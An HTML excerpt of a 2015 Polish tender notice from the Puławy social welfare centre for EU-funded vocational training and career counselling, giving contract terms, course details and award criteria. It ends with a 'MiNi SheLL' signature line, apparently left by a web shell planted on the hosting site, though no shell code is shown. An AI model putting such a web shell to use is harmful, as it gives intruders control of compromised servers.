1. Zmiany terminu wykonania przedmiotu umowy wywołanej w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia oraz wystąpienia wyjątkowych sytuacji -jedynie za zgodą Zamawiającego;
2. Zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ;
3. Zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika w wyjątkowych sytuacjach, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych;
4.Zmiany ceny - cena jednostkowa będzie mogła ulec zmianie na skutek zmiany stawek podatkowych, dla przedmiotu zamówienia, wystąpienie o zmianę cen jednostkowych przez Wykonawcę musi odbyć się wyprzedzeniem, nie później niż 7 dni przed 
5.Zmiany wynagrodzenia Wykonawcy za zrealizowane szkolenie może nastąpić wyłącznie w przypadku:
* wycofania z realizacji części przedmiotu umowy ze względów organizacyjnych, ekonomicznych lub finansowych Zamawiająego.
* Skierowania uczestników na badania i orzeczeniu o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich.
6. Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienia ani na wynik postepowania. Takimi zmianami są zmiany o charakterze administracyjno-organizacyjnym umowy np. zmiany dotyczące nazwy, siedziby wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, zmiana innych danych identyfikacyjnych, zmiany prowadzące do poprawy oczywistych omyłek pisarskich i rachunkowych w  treści umowy.
7. Zmiany wprowadzone do umowy będą obowiązywały po podpisaniu odpowiedniego aneksu przez obie strony.
8. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z zawartą umową</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.pulawy.pl/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy;pok nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2015 godzina 07:30, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Aktywni-niezależni realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej Działanie 7.1 - Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 - Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca, kasjer, fakturzysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 2 osoby ( +/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin: 90 godzin szkoleniowych, w tym 32 godzin zajęć teoretycznych , 56 godzin zajęć praktycznych i 2 godziny dydaktyczne egzamin.
Jedna godzina szkoleniowa liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio 15 min., przy czym długość przerw może być ustalona w sposób elastyczny.
Czas trwania szkolenia: Szkolenie może odbywać się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 16:00  z zastrzeżeniem, że w ciągu jednego dnia maksymalna liczba godzin szkoleniowych nie przekroczy 8.
Miejsce szkolenia: teren Puław lub w odległości nie większej niż 50 km od Puław w takim przypadku  wykonawca zapewnia codzienny dojazd na szkolenie lub zwrot kosztów podróży ( bus, komunikacja miejska poza Puławami) z miejsca zamieszkania do miejsca szkolenia i z powrotem.
Termin szkolenia:  Termin do uzgodnienia w okresie IV - 10.VI. 2015r. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego  
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu Aktywni-niezależni
Cel szkolenia: Nabycie wiedzy i umiejętności wymaganych na stanowisku sprzedawcy z wykorzystaniem urządzeń komputerowych i kas fiskalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w przeprowadzeniu  szkoleń obejmujący przedm. zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Magazynier z obsługą wózków jezdniowych z napędem silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 2 osoby ( +/- 1 osoba)
Liczba godzin: 120 godzin szkoleniowych, w tym 98 godzin zajęć teoretycznych, 20 godzin zajęć praktycznych i 2 godziny dydaktyczne egzamin. W ciągu jednego dnia maksymalna liczba godzin szkoleniowych nie przekroczy 8. Jedna godzina szkoleniowa liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio15 min., przy czym długość przerw może być ustalona w sposób elastyczny. 
Czas trwania szkolenia: Szkolenie może odbyć się w dni robocze, tj. od poniedziałku do piątku, w godzinach między 8:00 a 15:00.  
Miejsce szkolenia: Puławy lub w odległości nie większej niż 50 km. W takim przypadku wykonawca zapewnia  codzienny dojazd na szkolenie lub zwrot kosztów podróży ( bus, komunikacja miejska poza Puławami).
Termin szkolenia:  IV -10.VI.2015r. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu Aktywni-niezależni
Cel szkolenia: przygotowanie teoretyczne i praktyczne oraz uzyskanie wiedzy, umiejętności i uprawnień operatora wózka widłowego oraz zdobycie umiejętności prowadzenia gospodarki magazynowej.
Zakres tematyczny: Zagadnienia z gospodarki magazynowej,  jazda wózkami widłowymi, obsługa komputerowych programów magazynowych. Minimalny zakres tematyczny kursu winien być zrealizowany zgodnie z rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz.U. Nr 70, poz. 650 z późn. zm.). program szkolenia powinien być uzgodniony z Urzędem Dozoru Technicznego
Sposób sprawdzania efektów szkolenia: szkolenie zostanie zakończone egzaminem zewnętrznym zgodnie z obowiązującymi przepisami w tym zakresie. W zakresie obsługi wózków jezdniowych niezwłocznie po zakończeniu szkolenia wykonawca zorganizuje  i opłaci egzamin zewnętrzny przed Urzędem Dozoru Technicznego w celu nabycia uprawnień do obsługi wózków jezdniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w przeprowadzeniu  szkoleń obejmujący przedm. zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 1 osoba ( możliwość odwołania w przypadku rezygnacji uczestnika)
Liczba godzin: 120 godzin szkoleniowych, w tym 90 godzin praktyki i 30 godzin teorii,  z zastrzeżeniem, że w ciągu jednego dnia maksymalna liczba godzin szkoleniowych nie przekroczy 8.
Jedna godzina szkoleniowa liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio 15 min., przy czym długość przerw może być ustalona w sposób elastyczny.
Czas trwania szkolenia: Szkolenie może odbywać się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00. 
Miejsce szkolenia: Puławy lub miejscowość  do 50 km od Puław. W przypadku przeprowadzania szkolenia poza Puławami wykonawca jest zobowiązany do sfinansowania uczestnikowi kosztów dojazdów z miejsca zamieszkania do miejsca szkolenia i z powrotem.
Termin szkolenia:  IV - 10 VI 2015
 Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu Aktywni-niezależni
Cel szkolenia: Opanowanie przez uczestników kursu podstawowych czynności niezbędnych do wykonania zawodu kucharza małej gastronomii..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w przeprowadzeniu  szkoleń obejmujący przedm. zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opiekun osób starszych, niepełnosprawnych  i dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 2 osoby ( +/- 1 osoba)
Liczba godzin: 100 godzin w tym 52 godziny  dydaktyczne (po 45 minut) teorii  w okresie 7 dni roboczych (po 8 godz. Dydaktycznych)  i 48 godzin zegarowych  praktyki w ciągu 6 dni roboczych.
Czas trwania szkolenia: Szkolenie może odbywać  się w dni robocze, tj. od poniedziałku do piątku  w godzinach między 8:00 a 15:00. 
 Miejsce szkolenia: Puławy lub miejscowość  do 50 km od Puław. W przypadku przeprowadzania szkolenia poza Puławami wykonawca jest zobowiązany do sfinansowania uczestnikowi kosztów dojazdów z miejsca zamieszkania do miejsca szkolenia i z powrotem.
 Zajęcia praktyczne -48 godziny zajęć w co najmniej 3 rodzajach placówek  opiekuńczych, w tym  co najmniej po 16 godzin w placówce wsparcia dziennego dla dzieci (przedszkole, żłobek, dom dziecka etc) -16 godzin w placówce opieki paliatywnej (hospicjum, szpital -oddział geriatrii), 16 godzin w placówce wsparcia osób niepełnosprawnych (ŚDS, ZAZ, WTZ ) i innych.
Termin szkolenia:  IV - 10.VI.2015r. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: Celem szkolenia jest przygotowanie uczestników do podjęcia pracy w charakterze opiekunki osób starszych, niepełnosprawnych i dzieci zarówno w instytucjach jak i w domach  prywatnych. Uczestnicy nabędą wiedzę teoretyczną i praktyczną z zakresu opieki i pielęgnacji osób zależnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w przeprowadzeniu  szkoleń obejmujący przedm. zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konserwator budynków i terenów zielonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 4 osoby (+/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin szkolenia: 100 h w tym teoria - 40 godzin dydaktycznych ( 5  dni roboczych po 8 dydaktycznych) i praktyka  60 godzin zegarowych w tym co najmniej 20 h zajęć praktycznych w budynkach.
Miejsce szkolenia: Puławy.
Termin szkolenia:  IV - 10 VI 2015. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Cel szkolenia: Szkolenie ma przygotować do pracy jako konserwator budynków i terenów zielonych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy w przeprowadzeniu  szkoleń obejmujący przedm. zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Indywidualne doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 16 osób ( +/- 1 osoba)
Czas trwania szkolenia: 32 h (1h = 45min), 2 h na każdą  osobę. Zajęcia powinny odbywać się w dni powszednie od poniedziałku do piątku w godzinach 8.00-16.00.
Termin szkolenia: 12,15,16,17  czerwca 2015 r. 
Miejsce  szkolenia: Puławy 
Minimalny zakres doradztwa:  
- sporządzenie Indywidualnego Planu Działania z określeniem obecnych kwalifikacji, potrzeby ich podwyższenia lub zmiany, określenia predyspozycji zawodowych, wyznaczenie ścieżki zawodowej pod kątem posiadanych kwalifikacji
 i umiejętności zawodowych;
- sporządzenie wspólnie z uczestnikiem CV i listu motywacyjnego w zakresie zakończonego szkolenia/ stażu;
- określenie potencjalnych pracodawców z wyszczególnieniem pracodawców lokalnego rynku pracy.
Na koniec doradztwa dla każdego beneficjenta ostatecznego zostanie sporządzony Indywidualny Plan Działania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie kadry - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com